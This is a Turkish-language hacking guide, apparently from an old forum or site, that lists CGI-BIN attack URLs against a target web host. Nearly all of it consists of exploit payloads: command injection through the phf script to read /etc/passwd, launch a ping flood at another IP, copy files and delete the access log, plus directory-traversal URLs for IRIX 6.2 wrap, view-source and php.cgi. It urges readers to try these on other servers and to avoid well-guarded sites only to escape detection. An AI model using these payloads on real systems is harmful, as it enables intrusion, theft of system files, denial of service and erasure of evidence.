a- (Phf scripti): Pek çok web ana bilgisayarı CGI-BIN güvenliğinden yoksundur. Bir de bunun üzerine sistem yöneticilerinin CGI-BIN güvenlik açıklarını bilmemesi potansiyel sistem açıklarına yol açmaktadır. Tüm dünyada pek çok hacker'ın kullandığı cgi-bin güvenlik açığı:
http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd
Fakat bazı uyanık sistem yöneticileri phf komutunun kullanımını sınırlamışlardır. Bu yüzden bu komutu çalıştıramayabilirsiniz. Fakat yine de alternatif web makineleri üzerinde denemekte yarar var.
b- (Wrap Scripti): Irix işletim sisteminin 6.2 versiyonunda rastlanan bu hatayı da şöyle istismar edebiliriz:
http://www.kıracağımızadres.com.tr/cgi-bin/wrap?../../../etc/passwd
http://www.kıracağımızadres.com.tr/cgi-bin/wrap?%0als (...)
Dikkat edeceğimiz tek nokta bu hata sadece IRIX 6.2'de var. !!
c- (View Source Scripti): Denemek serbest (başarıya ulaşabilme ihtimali kadar ulaşamama ihtimali de var)
http://www.kıracağımızadres.com.tr/cgi-bin/view-source?../../../etc/passwd ya da
http://www.kıracağımızadres.com.tr/cgi-bin/view-source?%1b or %0a %20
d- (php.cgi Scripti):
http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd
e- Diğer Denenebilir Scriptiler:
http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s %205000%20ip%20to%20shoot
http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20fhp
http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20.blah
http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go
http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate
http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0arm%20../logs/access_log
Dikkat: Tüm Httpd girişleri ana bilgisayarlarda günlük şeklinde tutulmaktadır. Bu yüzden güvenliği çok yüksek ve sizin başınıza bela açacağınızı düşündüğünüz sitelere bu yöntemle erişmeyi kesinlikle düşünmeyin !!!